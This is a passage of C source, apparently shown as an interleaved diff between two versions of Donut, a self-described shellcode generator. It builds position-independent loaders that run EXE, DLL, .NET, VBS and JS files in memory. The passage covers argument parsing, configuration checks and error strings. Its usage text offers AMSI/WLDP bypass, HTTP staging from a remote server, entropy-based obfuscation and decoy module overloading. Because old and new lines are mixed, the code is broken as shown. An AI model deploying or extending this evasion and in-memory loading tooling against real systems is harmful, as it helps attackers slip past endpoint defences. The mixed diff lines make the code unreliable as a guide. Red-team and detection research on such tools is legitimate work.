1446 *
1447 * INPUT : Name of DLL function to check.
1448 *
1449 * OUTPUT : 1 if found, else 0
1450 */
1451 static int is_dll_export(const char *function) {
1452 PIMAGE_DATA_DIRECTORY dir;
1453 PIMAGE_EXPORT_DIRECTORY exp;
1454 DWORD rva, cnt;
1455 ULONG64 ofs;
1456 PDWORD sym;
1457 PCHAR str;
1458 int found = 0;
1459
1460 DPRINT("Entering.");
1461
1462 dir = Dirs(fi.data);
1463 if(dir != NULL) {
1464 rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
1465 DPRINT("EAT VA : %lx", rva);
1466 if(rva != 0) {
1467 ofs = rva2ofs(fi.data, rva);
1468 DPRINT("Offset = %" PRIX64 "\n", ofs);
1469 if(ofs != -1) {
1470 exp = (PIMAGE_EXPORT_DIRECTORY)(fi.data + ofs);
1471 cnt = exp->NumberOfNames;
1472 DPRINT("Number of exported functions : %lx", cnt);
1473
1474 if(cnt != 0) {
1475 sym = (PDWORD)(rva2ofs(fi.data, exp->AddressOfNames) + fi.data);
1476 // scan array for symbol
1477 do {
1478 str = (PCHAR)(rva2ofs(fi.data, sym[cnt - 1]) + fi.data);
1479 // if match found, exit
1480 if(strcmp(str, function) == 0) {
1481 DPRINT("Found API");
1482 found = 1;
1483 break;
1484 }
1485 } while (--cnt);
1486 }
1487 }
1488 }
1489 }
1490 DPRINT("Leaving.");
1491 return found;
1492 }
1493
1494 /**
1495 * Function: validate_file_cfg
1496 * ----------------------------
1497 * Validates configuration for the input file.
1498 *
1499 * INPUT : Pointer to Donut configuration.
1500 *
1501 * OUTPUT : Donut error code.
1502 */
1503 static int validate_file_cfg(PDONUT_CONFIG c) {
1504 DPRINT("Validating configuration for input file.");
1505
1506 // Unmanaged EXE/DLL?
1507 if(fi.type == DONUT_MODULE_DLL ||
1508 fi.type == DONUT_MODULE_EXE)
1509 {
1510 // Requested shellcode is x86, but file is x64?
1511 // Requested shellcode is x64, but file is x86?
1512 if((c->arch == DONUT_ARCH_X86 &&
1513 fi.arch == DONUT_ARCH_X64) ||
1514 (c->arch == DONUT_ARCH_X64 &&
1515 fi.arch == DONUT_ARCH_X86))
1516 {
1517 DPRINT("Target architecture %"PRId32 " is not compatible with DLL/EXE %"PRId32, c->arch, fi.arch);
1518 return DONUT_ERROR_ARCH_MISMATCH;
1519 }
1520 // DLL function specified. Does it exist?
1521 if(fi.type == DONUT_MODULE_DLL && c->method[0] != 0)
1522 {
1523 if(!is_dll_export(c->method)) {
1524 DPRINT("Unable to locate function \"%s\" in DLL", c->method);
1525 return DONUT_ERROR_DLL_FUNCTION;
1526 }
1527 }
1528 }
1529 // .NET DLL assembly?
1530 if(fi.type == DONUT_MODULE_NET_DLL) {
1531 // DLL requires class and method
1532 if(c->cls[0] == 0 || c->method[0] == 0) {
1533 DPRINT("Input file is a .NET assembly, but no class and method have been specified.");
1534 return DONUT_ERROR_NET_PARAMS;
1535 }
1536 }
1537
1538 // is this an unmanaged DLL with parameters?
1539 if(fi.type == DONUT_MODULE_DLL && c->args[0] != 0) {
1540 // we need a DLL function
1541 if(c->method[0] == 0) {
1542 DPRINT("Parameters are provided for an unmanaged/native DLL, but no function.");
1543 return DONUT_ERROR_DLL_PARAM;
1544 }
1545 }
1546 DPRINT("Validation passed.");
1547 return DONUT_ERROR_OK;
1548 }
1549
1550 /**
1551 * Function: DonutCreate
1552 * ----------------------------
1553 * Builds a position-independent loader for VBS/JS/EXE/DLL files.
1554 *
1555 * INPUT : Pointer to a Donut configuration.
1556 *
1557 * OUTPUT : Donut error code.
1558 */
1559 EXPORT_FUNC
1560 int DonutCreate(PDONUT_CONFIG c) {
1561 int err = DONUT_ERROR_OK;
1562
1563 DPRINT("Entering.");
1564
1565 c->mod = c->pic = c->inst = NULL;
1566 c->mod_len = c->pic_len = c->inst_len = 0;
1567
1568 // 1. validate the loader configuration
1569 err = validate_loader_cfg(c);
1570 if(err == DONUT_ERROR_OK) {
1571 // 2. get information about the file to execute in memory
1572 err = read_file_info(c);
1573 if(err == DONUT_ERROR_OK) {
1574 // 3. validate the module configuration
1575 err = validate_file_cfg(c);
1576 if(err == DONUT_ERROR_OK) {
1577 // 4. build the module
1578 err = build_module(c);
1579 if(err == DONUT_ERROR_OK) {
1580 // 5. build the instance
1581 err = build_instance(c);
1582 if(err == DONUT_ERROR_OK) {
1583 // 6. build the loader
1584 err = build_loader(c);
1585 if(err == DONUT_ERROR_OK) {
1586 // 7. save loader and any additional files to disk
1587 err = save_loader(c);
1588 }
1589 }
1590 }
1591 }
1592 }
1593 }
10651594 // if there was some error, release resources
1066 if(err != DONUT_ERROR_SUCCESS) {
1595 if(err != DONUT_ERROR_OK) {
10671596 DonutDelete(c);
10681597 }
1069 unmap_file(&fi);
1070 DPRINT("Leaving.");
1598 DPRINT("Leaving with error : %" PRId32, err);
10711599 return err;
10721600 }
10731601
1074 // release resources allocated for configuration
1602 /**
1603 * Function: DonutDelete
1604 * ----------------------------
1605 * Releases memory allocated by internal Donut functions.
1606 *
1607 * INPUT : Pointer to a Donut configuration previously used by DonutCreate.
1608 *
1609 * OUTPUT : Donut error code.
1610 */
10751611 EXPORT_FUNC
10761612 int DonutDelete(PDONUT_CONFIG c) {
10771613
10811617 }
10821618 // free module
10831619 if(c->mod != NULL) {
1620 DPRINT("Releasing memory for module.");
10841621 free(c->mod);
10851622 c->mod = NULL;
10861623 }
10871624 // free instance
10881625 if(c->inst != NULL) {
1626 DPRINT("Releasing memory for configuration.");
10891627 free(c->inst);
10901628 c->inst = NULL;
10911629 }
1092 // free payload
1630 // free loader
10931631 if(c->pic != NULL) {
1632 DPRINT("Releasing memory for loader.");
10941633 free(c->pic);
10951634 c->pic = NULL;
10961635 }
1636 unmap_file();
1637
10971638 DPRINT("Leaving.");
1098 return DONUT_ERROR_SUCCESS;
1099 }
1100
1101 // define when building an executable
1102 #ifdef DONUT_EXE
1103
1104 const char *err2str(int err) {
1639 return DONUT_ERROR_OK;
1640 }
1641
1642 /**
1643 * Function: DonutError
1644 * ----------------------------
1645 * Converts Donut error code into a string
1646 *
1647 * INPUT : error code returned by DonutCreate
1648 *
1649 * OUTPUT : error code as a string
1650 */
1651 EXPORT_FUNC
1652 const char *DonutError(int err) {
11051653 static const char *str="N/A";
11061654
11071655 switch(err) {
1108 case DONUT_ERROR_SUCCESS:
1109 str = "No error";
1656 case DONUT_ERROR_OK:
1657 str = "No error.";
11101658 break;
11111659 case DONUT_ERROR_FILE_NOT_FOUND:
1112 str = "File not found";
1660 str = "File not found.";
11131661 break;
11141662 case DONUT_ERROR_FILE_EMPTY:
1115 str = "File is empty";
1663 str = "File is empty.";
11161664 break;
11171665 case DONUT_ERROR_FILE_ACCESS:
1118 str = "Cannot open file";
1666 str = "Cannot open file.";
11191667 break;
11201668 case DONUT_ERROR_FILE_INVALID:
1121 str = "File is invalid";
1669 str = "File is invalid.";
11221670 break;
11231671 case DONUT_ERROR_NET_PARAMS:
1124 str = "File is a .NET DLL. Donut requires a class and method";
1672 str = "File is a .NET DLL. Donut requires a class and method.";
11251673 break;
11261674 case DONUT_ERROR_NO_MEMORY:
1127 str = "No memory available";
1675 str = "Memory allocation failed.";
11281676 break;
11291677 case DONUT_ERROR_INVALID_ARCH:
1130 str = "Invalid architecture specified";
1678 str = "Invalid architecture specified.";
11311679 break;
11321680 case DONUT_ERROR_INVALID_URL:
1133 str = "Invalid URL";
1681 str = "Invalid URL.";
11341682 break;
11351683 case DONUT_ERROR_URL_LENGTH:
1136 str = "Invalid URL length";
1684 str = "Invalid URL length.";
11371685 break;
11381686 case DONUT_ERROR_INVALID_PARAMETER:
1139 str = "Invalid parameter";
1687 str = "Invalid parameter.";
11401688 break;
11411689 case DONUT_ERROR_RANDOM:
1142 str = "Error generating random values";
1690 str = "Error generating random values.";
11431691 break;
11441692 case DONUT_ERROR_DLL_FUNCTION:
1145 str = "Unable to locate DLL function provided. Names are case sensitive";
1693 str = "Unable to locate DLL function provided. Names are case sensitive.";
11461694 break;
11471695 case DONUT_ERROR_ARCH_MISMATCH:
1148 str = "Target architecture cannot support selected DLL/EXE file";
1696 str = "Target architecture cannot support selected DLL/EXE file.";
11491697 break;
11501698 case DONUT_ERROR_DLL_PARAM:
1151 str = "You've supplied parameters for an unmanaged DLL. Donut also requires a DLL function";
1699 str = "You've supplied parameters for an unmanaged DLL. Donut also requires a DLL function.";
11521700 break;
11531701 case DONUT_ERROR_BYPASS_INVALID:
1154 str = "Invalid bypass option specified";
1155 break;
1156 }
1702 str = "Invalid bypass option specified.";
1703 break;
1704 case DONUT_ERROR_HEADERS_INVALID:
1705 str = "Invalid PE headers preservation option.";
1706 break;
1707 case DONUT_ERROR_INVALID_FORMAT:
1708 str = "The output format is invalid.";
1709 break;
1710 case DONUT_ERROR_INVALID_ENGINE:
1711 str = "The compression engine is invalid.";
1712 break;
1713 case DONUT_ERROR_COMPRESSION:
1714 str = "There was an error during compression.";
1715 break;
1716 case DONUT_ERROR_INVALID_ENTROPY:
1717 str = "Invalid entropy level specified.";
1718 break;
1719 case DONUT_ERROR_MIXED_ASSEMBLY:
1720 str = "Mixed (native and managed) assemblies are currently unsupported.";
1721 break;
1722 case DONUT_ERROR_DECOY_INVALID:
1723 str = "Path of decoy module is invalid.";
1724 break;
1725 }
1726 DPRINT("Error result : %s", str);
11571727 return str;
11581728 }
11591729
1160 static char* get_param (int argc, char *argv[], int *i) {
1161 int n = *i;
1162 if (argv[n][2] != 0) {
1163 return &argv[n][2];
1164 }
1165 if ((n+1) < argc) {
1166 *i = n + 1;
1167 return argv[n+1];
1168 }
1169 printf(" [ %c%c requires parameter\n", argv[n][0], argv[n][1]);
1170 exit (0);
1730 #ifdef DONUT_EXE
1731
1732 #define OPT_MAX_STRING 256
1733
1734 #define OPT_TYPE_NONE 1
1735 #define OPT_TYPE_STRING 2
1736 #define OPT_TYPE_DEC 3
1737 #define OPT_TYPE_HEX 4
1738 #define OPT_TYPE_FLAG 5
1739 #define OPT_TYPE_DEC64 6
1740 #define OPT_TYPE_HEX64 7
1741
1742 // structure to hold data of any type
1743 typedef union _opt_arg_t {
1744 int flag;
1745
1746 int8_t s8;
1747 uint8_t u8;
1748 int8_t *s8_ptr;
1749 uint8_t *u8_ptr;
1750
1751 int16_t s16;
1752 uint16_t u16;
1753 int16_t *s16_ptr;
1754 uint16_t *u16_ptr;
1755
1756 int32_t s32;
1757 uint32_t u32;
1758 int32_t *s32_ptr;
1759 uint32_t *u32_ptr;
1760
1761 int64_t s64;
1762 uint64_t u64;
1763 int64_t *s64_ptr;
1764 uint64_t *u64_ptr;
1765
1766 void *ptr;
1767 char str[OPT_MAX_STRING+1];
1768 } opt_arg;
1769
1770 typedef void (*void_callback_t)(void); // execute callback with no return value or argument
1771 typedef int (*arg_callback_t)(opt_arg*,void*); // process argument, optionally store in optarg
1772
1773 static int get_opt(
1774 int argc, // total number of elements in argv
1775 char *argv[], // argument array
1776 int arg_type, // type of argument expected (none, flag, decimal, hexadecimal, string)
1777 void *output, // pointer to variable that stores argument
1778 char *short_opt, // short form of option. e.g: -a
1779 char *long_opt, // long form of option. e.g: --arch
1780 void *callback) // callback function to process argument
1781 {
1782 int valid = 0, i, req = 0, opt_len, opt_type;
1783 char *args=NULL, *opt=NULL, *arg=NULL, *tmp=NULL;
1784 opt_arg *optarg = (opt_arg*)output;
1785 void_callback_t void_cb;
1786 arg_callback_t arg_cb;
1787
1788 // perform some basic validation
1789 if(argc <= 1) return 0;
1790 if(argv == NULL) return 0;
1791
1792 if(arg_type != OPT_TYPE_NONE &&
1793 arg_type != OPT_TYPE_STRING &&
1794 arg_type != OPT_TYPE_DEC &&
1795 arg_type != OPT_TYPE_HEX &&
1796 arg_type != OPT_TYPE_FLAG) return 0;
1797
1798 DPRINT("Arg type for %s, %s : %s",
1799 short_opt != NULL ? short_opt : "N/A",
1800 long_opt != NULL ? long_opt : "N/A",
1801 arg_type == OPT_TYPE_NONE ? "None" :
1802 arg_type == OPT_TYPE_STRING ? "String" :
1803 arg_type == OPT_TYPE_DEC ? "Decimal" :
1804 arg_type == OPT_TYPE_HEX ? "Hexadecimal" :
1805 arg_type == OPT_TYPE_FLAG ? "Flag" : "Unknown");
1806
1807 // for each argument in array
1808 for(i=1; i<argc && !valid; i++) {
1809 // set the current argument to examine
1810 arg = argv[i];
1811 // if it doesn't contain a switch, skip it
1812 if(*arg != '-') continue;
1813 // we have a switch. initially, we assume short form
1814 arg++;
1815 opt_type = 0;
1816 // long form? skip one more and change the option type
1817 if(*arg == '-') {
1818 arg++;
1819 opt_type++;
1820 }
1821
1822 // is an argument required by the user?
1823 req = ((arg_type != OPT_TYPE_NONE) && (arg_type != OPT_TYPE_FLAG));
1824 // use short or long form for current argument being examined
1825 opt = (opt_type) ? long_opt : short_opt;
1826 // if no form provided by user for current argument, skip it
1827 if(opt == NULL) continue;
1828 // copy string to dynamic buffer
1829 opt_len = strlen(opt);
1830 if(opt_len == 0) continue;
1831
1832 tmp = calloc(sizeof(uint8_t), opt_len + 1);
1833 if(tmp == NULL) {
1834 DPRINT("Unable to allocate memory for %s.\n", opt);
1835 continue;
1836 } else {
1837 strcpy(tmp, opt);
1838 }
1839 // tokenize the string.
1840 opt = strtok(tmp, ";");
1841 // while we have options
1842 while(opt != NULL && !valid) {
1843 // get the length
1844 opt_len = strlen(opt);
1845 // do we have a match?
1846 if(!strncmp(opt, arg, opt_len)) {
1847 //
1848 // at this point, we have a valid matching argument
1849 // if something fails from here on in, return invalid
1850 //
1851 // skip the option
1852 arg += opt_len;
1853 // an argument is *not* required
1854 if(!req) {
1855 // so is the next byte non-zero? return invalid
1856 if(*arg != 0) return 0;
1857 } else {
1858 // an argument is required
1859 // if the next byte is a colon or assignment operator, skip it.
1860 if(*arg == ':' || *arg == '=') arg++;
1861
1862 // if the next byte is zero
1863 if(*arg == 0) {
1864 // and no arguments left. return invalid
1865 if((i + 1) >= argc) return 0;
1866 args = argv[i + 1];
1867 } else {
1868 args = arg;
1869 }
1870 }
1871 // end loop
1872 valid = 1;
1873 break;
1874 }
1875 opt = strtok(NULL, ";");
1876 }
1877 if(tmp != NULL) free(tmp);
1878 }
1879
1880 // if valid option found
1881 if(valid) {
1882 DPRINT("Found match");
1883 // ..and a callback exists
1884 if(callback != NULL) {
1885 // if we have a parameter
1886 if(args != NULL) {
1887 DPRINT("Executing callback with %s.", args);
1888 // execute with parameter
1889 arg_cb = (arg_callback_t)callback;
1890 arg_cb(optarg, args);
1891 } else {
1892 DPRINT("Executing callback.");
1893 // otherwise, execute without
1894 void_cb = (void_callback_t)callback;
1895 void_cb();
1896 }
1897 } else {
1898 // there's no callback, try process ourselves
1899 if(args != NULL) {
1900 DPRINT("Parsing %s\n", args);
1901 switch(arg_type) {
1902 case OPT_TYPE_DEC:
1903 case OPT_TYPE_HEX:
1904 DPRINT("Converting %s to 32-bit binary", args);
1905 optarg->u32 = strtoul(args, NULL, arg_type == OPT_TYPE_DEC ? 10 : 16);
1906 break;
1907 case OPT_TYPE_DEC64:
1908 case OPT_TYPE_HEX64:
1909 DPRINT("Converting %s to 64-bit binary", args);
1910 optarg->u64 = strtoull(args, NULL, arg_type == OPT_TYPE_DEC64 ? 10 : 16);
1911 break;
1912 case OPT_TYPE_STRING:
1913 DPRINT("Copying %s to output", args);
1914 strncpy(optarg->str, args, OPT_MAX_STRING);
1915 break;
1916 }
1917 } else {
1918 // there's no argument, just set the flag
1919 DPRINT("Setting flag");
1920 optarg->flag = 1;
1921 }
1922 }
1923 }
1924 // return result
1925 return valid;
1926 }
1927
1928 // callback to validate architecture
1929 static int validate_arch(opt_arg *arg, void *args) {
1930 char *str = (char*)args;
1931
1932 arg->u32 = 0;
1933 if(str == NULL) return 0;
1934
1935 // single digit? convert to binary
1936 if(strlen(str) == 1 && isdigit((int)*str)) {
1937 arg->u32 = atoi(str);
1938 } else {
1939 // otherwise, try map it to digit
1940 if(!strcasecmp("x86", str)) {
1941 arg->u32 = DONUT_ARCH_X86;
1942 } else
1943 if(!strcasecmp("amd64", str)) {
1944 arg->u32 = DONUT_ARCH_X64;
1945 } else
1946 if(!strcasecmp("x84", str)) {
1947 arg->u32 = DONUT_ARCH_X84;
1948 }
1949 }
1950
1951 // validate
1952 switch(arg->u32) {
1953 case DONUT_ARCH_X86:
1954 case DONUT_ARCH_X64:
1955 case DONUT_ARCH_X84:
1956 break;
1957 default: {
1958 printf("WARNING: Invalid architecture specified: %"PRId32" -- setting to x86+amd64\n", arg->u32);
1959 arg->u32 = DONUT_ARCH_X84;
1960 }
1961 }
1962 return 1;
1963 }
1964
1965 static int validate_exit(opt_arg *arg, void *args) {
1966 char *str = (char*)args;
1967
1968 arg->u32 = 0;
1969 if(str == NULL) return 0;
1970
1971 if(strlen(str) == 1 && isdigit((int)*str)) {
1972 arg->u32 = atoi(str);
1973 } else {
1974 if(!strcasecmp("thread", str)) {
1975 arg->u32 = DONUT_OPT_EXIT_THREAD;
1976 } else
1977 if(!strcasecmp("process", str)) {
1978 arg->u32 = DONUT_OPT_EXIT_PROCESS;
1979 }
1980 }
1981
1982 switch(arg->u32) {
1983 case DONUT_OPT_EXIT_THREAD:
1984 case DONUT_OPT_EXIT_PROCESS:
1985 break;
1986 default: {
1987 printf("WARNING: Invalid exit option specified: %"PRId32" -- setting to thread\n", arg->u32);
1988 arg->u32 = DONUT_OPT_EXIT_THREAD;
1989 }
1990 }
1991 return 1;
1992 }
1993
1994 static int validate_entropy(opt_arg *arg, void *args) {
1995 char *str = (char*)args;
1996
1997 arg->u32 = 0;
1998 if(str == NULL) {
1999 DPRINT("NULL argument.");
2000 return 0;
2001 }
2002 if(strlen(str) == 1 && isdigit((int)*str)) {
2003 DPRINT("Converting %s to number.", str);
2004 arg->u32 = strtoul(str, NULL, 10);
2005 } else {
2006 if(!strcasecmp("none", str)) {
2007 arg->u32 = DONUT_ENTROPY_NONE;
2008 } else
2009 if(!strcasecmp("low", str)) {
2010 arg->u32 = DONUT_ENTROPY_RANDOM;
2011 } else
2012 if(!strcasecmp("full", str)) {
2013 arg->u32 = DONUT_ENTROPY_DEFAULT;
2014 }
2015 }
2016
2017 // validate
2018 switch(arg->u32) {
2019 case DONUT_ENTROPY_NONE:
2020 case DONUT_ENTROPY_RANDOM:
2021 case DONUT_ENTROPY_DEFAULT:
2022 break;
2023 default: {
2024 printf("WARNING: Invalid entropy option specified: %"PRId32" -- setting to default\n", arg->u32);
2025 arg->u32 = DONUT_ENTROPY_DEFAULT;
2026 }
2027 }
2028 return 1;
2029 }
2030
2031 // callback to validate format
2032 static int validate_format(opt_arg *arg, void *args) {
2033 char *str = (char*)args;
2034
2035 arg->u32 = 0;
2036 if(str == NULL) return 0;
2037
2038 // if it's a single digit, return it as binary
2039 if(strlen(str) == 1 && isdigit((int)*str)) {
2040 arg->u32 = atoi(str);
2041 } else {
2042 // otherwise, try map it to digit
2043 if(!strcasecmp("bin", str)) {
2044 arg->u32 = DONUT_FORMAT_BINARY;
2045 } else
2046 if(!strcasecmp("base64", str)) {
2047 arg->u32 = DONUT_FORMAT_BASE64;
2048 } else
2049 if(!strcasecmp("c", str)) {
2050 arg->u32 = DONUT_FORMAT_C;
2051 } else
2052 if(!strcasecmp("rb", str) || !strcasecmp("ruby", str)) {
2053 arg->u32 = DONUT_FORMAT_RUBY;
2054 } else
2055 if(!strcasecmp("py", str) || !strcasecmp("python", str)) {
2056 arg->u32 = DONUT_FORMAT_PYTHON;
2057 } else
2058 if(!strcasecmp("ps", str) || !strcasecmp("powershell", str)) {
2059 arg->u32 = DONUT_FORMAT_POWERSHELL;
2060 } else
2061 if(!strcasecmp("cs", str) || !strcasecmp("csharp", str)) {
2062 arg->u32 = DONUT_FORMAT_CSHARP;
2063 } else
2064 if(!strcasecmp("hex", str)) {
2065 arg->u32 = DONUT_FORMAT_HEX;
2066 }
2067 }
2068 // validate
2069 switch(arg->u32) {
2070 case DONUT_FORMAT_BINARY:
2071 case DONUT_FORMAT_BASE64:
2072 case DONUT_FORMAT_C:
2073 case DONUT_FORMAT_RUBY:
2074 case DONUT_FORMAT_PYTHON:
2075 case DONUT_FORMAT_POWERSHELL:
2076 case DONUT_FORMAT_CSHARP:
2077 case DONUT_FORMAT_HEX:
2078 break;
2079 default: {
2080 printf("WARNING: Invalid format specified: %"PRId32" -- setting to binary.\n", arg->u32);
2081 arg->u32 = DONUT_FORMAT_BINARY;
2082 }
2083 }
2084 return 1;
2085 }
2086
2087 // --bypass=w
2088 //
2089 //
2090 // a = amsi
2091 // e = etw
2092 // w = wldp
2093 //
2094 // --bypass=w
2095 static int validate_bypass(opt_arg *arg, void *args) {
2096 char *str = (char*)args;
2097
2098 arg->u32 = 0;
2099 if(str == NULL) return 0;
2100
2101 // just temporary
2102 arg->u32 = atoi(str);
2103
2104 return 1;
2105 }
2106
2107 // calback to validate headers options
2108 static int validate_headers(opt_arg *arg, void *args) {
2109 char *str = (char*)args;
2110
2111 arg->u32 = 0;
2112 if(str == NULL) return 0;
2113
2114 // just temporary
2115 arg->u32 = atoi(str);
2116
2117 return 1;
11712118 }
11722119
11732120 static void usage (void) {
1174 printf(" usage: donut [options] -f <EXE/DLL/VBS/JS/XSL>\n\n");
1175
2121 printf(" usage: donut [options] <EXE/DLL/VBS/JS>\n\n");
2122 printf(" Only the finest artisanal donuts are made of shells.\n\n");
11762123 printf(" -MODULE OPTIONS-\n\n");
1177 printf(" -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory.\n");
1178 printf(" -u <URL> HTTP server that will host the donut module.\n\n");
1179
2124 printf(" -n,--modname: <name> Module name for HTTP staging. If entropy is enabled, this is generated randomly.\n");
2125 printf(" -s,--server: <server> Server that will host the Donut module. Credentials may be provided in the following format: https://username:[email protected]/\n");
2126 printf(" -e,--entropy: <level> Entropy. 1=None, 2=Use random names, 3=Random names + symmetric encryption (default)\n\n");
2127
11802128 printf(" -PIC/SHELLCODE OPTIONS-\n\n");
1181 printf(" -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).\n");
1182 printf(" -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)\n");
1183 printf(" -o <payload> Output file. Default is \"payload.bin\"\n\n");
1184
1185 printf(" -DOTNET OPTIONS-\n\n");
1186 printf(" -c <namespace.class> Optional class name. (required for .NET DLL)\n");
1187 printf(" -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL)\n");
1188 printf(" -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon.\n");
1189 printf(" -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.\n");
1190 printf(" -d <name> AppDomain name to create for .NET. Randomly generated by default.\n\n");
1191
2129 printf(" -a,--arch: <arch>,--cpu: <arch> Target architecture : 1=x86, 2=amd64, 3=x86+amd64(default).\n");
2130 printf(" -o,--output: <path> Output file to save loader. Default is \"loader.bin\"\n");
2131 printf(" -f,--format: <format> Output format. 1=Binary (default), 2=Base64, 3=C, 4=Ruby, 5=Python, 6=Powershell, 7=C#, 8=Hex\n");
2132 printf(" -y,--fork: <addr> Create thread for loader and continue execution at <addr> supplied.\n");
2133 printf(" -x,--exit: <action> Exit behaviour. 1=Exit thread (default), 2=Exit process\n\n");
2134
2135 printf(" -FILE OPTIONS-\n\n");
2136 printf(" -c,--class: <namespace.class> Optional class name. (required for .NET DLL)\n");
2137 printf(" -d,--domain: <name> AppDomain name to create for .NET assembly. If entropy is enabled, this is generated randomly.\n");
2138 printf(" -i,--input: <path>,--file: <path> Input file to execute in-memory.\n");
2139 printf(" -m,--method: <method>,--function: <api> Optional method or function for DLL. (a method is required for .NET DLL)\n");
2140 printf(" -p,--args: <arguments> Optional parameters/command line inside quotations for DLL method/function or EXE.\n");
2141 printf(" -w,--unicode Command line is passed to unmanaged DLL function in UNICODE format. (default is ANSI)\n");
2142 printf(" -r,--runtime: <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.\n");
2143 printf(" -t,--thread Execute the entrypoint of an unmanaged EXE as a thread.\n\n");
2144
2145 printf(" -EXTRA-\n\n");
2146 #ifdef WINDOWS
2147 printf(" -z,--compress: <engine> Pack/Compress file. 1=None, 2=aPLib, 3=LZNT1, 4=Xpress.\n");
2148 #else
2149 printf(" -z,--compress: <engine> Pack/Compress file. 1=None, 2=aPLib\n");
2150 #endif
2151 printf(" -b,--bypass: <level> Bypass AMSI/WLDP : 1=None, 2=Abort on fail, 3=Continue on fail.(default)\n\n");
2152 printf(" -k,--headers: <level> Preserve PE headers. 1=Overwrite (default), 2=Keep all\n\n");
2153 printf(" -j,--decoy: <level> Optional path of decoy module for Module Overloading.\n\n");
2154
11922155 printf(" examples:\n\n");
1193 printf(" donut -f c2.dll\n");
1194 printf(" donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll\n");
1195 printf(" donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/\n");
2156 printf(" donut -ic2.dll\n");
2157 printf(" donut --arch:x86 --class:TestClass --method:RunProcess --args:notepad.exe --input:loader.dll\n");
2158 printf(" donut -iloader.dll -c TestClass -m RunProcess -p\"calc notepad\" -s http://remote_server.com/modules/\n");
11962159
11972160 exit (0);
11982161 }
11992162
12002163 int main(int argc, char *argv[]) {
12012164 DONUT_CONFIG c;
1202 char opt;
1203 int i, err;
1204 FILE *fd;
1205 char *mod_type, *payload="payload.bin",
1206 *arch_str[3] = { "x86", "AMD64", "x86+AMD64" };
1207 char *inst_type[2]= { "PIC", "URL" };
2165 int err;
2166 char *mod_type;
2167 char *arch_str[3] = { "x86", "amd64", "x86+amd64" };
2168 char *inst_type[2]= { "Embedded", "HTTP" };
12082169
12092170 printf("\n");
1210 printf(" [ Donut shellcode generator v0.9.2\n");
1211 printf(" [ Copyright (c) 2019 TheWover, Odzhan\n\n");
2171 printf(" [ Donut shellcode generator v0.9.3 (built " __DATE__ " " __TIME__ ")\n");
2172 printf(" [ Copyright (c) 2019-2021 TheWover, Odzhan\n\n");
12122173
12132174 // zero initialize configuration
12142175 memset(&c, 0, sizeof(c));
12152176
1216 // default type is position independent code for dual-mode (x86 + amd64)
1217 c.inst_type = DONUT_INSTANCE_PIC;
1218 c.arch = DONUT_ARCH_X84;
2177 // default settings
2178 c.inst_type = DONUT_INSTANCE_EMBED; // file is embedded
2179 c.arch = DONUT_ARCH_X84; // dual-mode (x86+amd64)
12192180 c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP fails
1220
1221 // parse arguments
1222 for(i=1; i<argc; i++) {
1223 // switch?
1224 if(argv[i][0] != '-' && argv[i][0] != '/') {
1225 usage();
1226 }
1227 opt = argv[i][1];
1228
1229 switch(opt) {
1230 // target cpu architecture
1231 case 'a':
1232 c.arch = atoi(get_param(argc, argv, &i));
1233 break;
1234 // bypass options
1235 case 'b':
1236 c.bypass = atoi(get_param(argc, argv, &i));
1237 break;
1238 // name of domain to use for .NET assembly
1239 case 'd':
1240 strncpy(c.domain, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1241 break;
1242 // EXE/DLL/VBS/JS/XSL file to embed in shellcode
1243 case 'f':
1244 strncpy(c.file, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1245 break;
1246 // runtime version to use for .NET DLL / EXE
1247 case 'r':
1248 strncpy(c.runtime, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1249 break;
1250 // URL of remote module
1251 case 'u': {
1252 strncpy(c.url, get_param(argc, argv, &i), DONUT_MAX_URL - 2);
1253 c.inst_type = DONUT_INSTANCE_URL;
1254 break;
1255 }
1256 // class of .NET assembly
1257 case 'c':
1258 strncpy(c.cls, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1259 break;
1260 // method of .NET assembly
1261 case 'm':
1262 strncpy(c.method, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1263 break;
1264 // output file for payload
1265 case 'o':
1266 payload = get_param(argc, argv, &i);
1267 break;
1268 // parameters to method or DLL function
1269 case 'p':
1270 strncpy(c.param, get_param(argc, argv, &i), sizeof(c.param) - 1);
1271 break;
1272 default:
1273 usage();
1274 break;
1275 }
1276 }
2181 c.headers = DONUT_HEADERS_OVERWRITE;// overwrites PE headers
2182 c.format = DONUT_FORMAT_BINARY; // default output format
2183 c.compress = DONUT_COMPRESS_NONE; // compression is disabled by default
2184 c.entropy = DONUT_ENTROPY_DEFAULT; // enable random names + symmetric encryption by default
2185 c.exit_opt = DONUT_OPT_EXIT_THREAD; // default behaviour is to exit the thread
2186 c.unicode = 0; // command line will not be converted to unicode for unmanaged DLL function
2187
2188 // get options
2189 get_opt(argc, argv, OPT_TYPE_NONE, NULL, "h;?", "help", usage);
2190 get_opt(argc, argv, OPT_TYPE_DEC, &c.arch, "a", "arch", validate_arch);
2191 get_opt(argc, argv, OPT_TYPE_DEC, &c.bypass, "b", "bypass", validate_bypass);
2192 get_opt(argc, argv, OPT_TYPE_DEC, &c.headers, "k", "headers", validate_headers);
2193 get_opt(argc, argv, OPT_TYPE_STRING, c.cls, "c", "class", NULL);
2194 get_opt(argc, argv, OPT_TYPE_STRING, c.domain, "d", "domain", NULL);
2195 get_opt(argc, argv, OPT_TYPE_DEC, &c.entropy, "e", "entropy", validate_entropy);
2196 get_opt(argc, argv, OPT_TYPE_DEC, &c.format, "f", "format", validate_format);
2197 get_opt(argc, argv, OPT_TYPE_STRING, c.input, "i", "input;file", NULL);
2198 get_opt(argc, argv, OPT_TYPE_STRING, c.method, "m", "method;function", NULL);
2199 get_opt(argc, argv, OPT_TYPE_STRING, c.modname, "n", "modname", NULL);
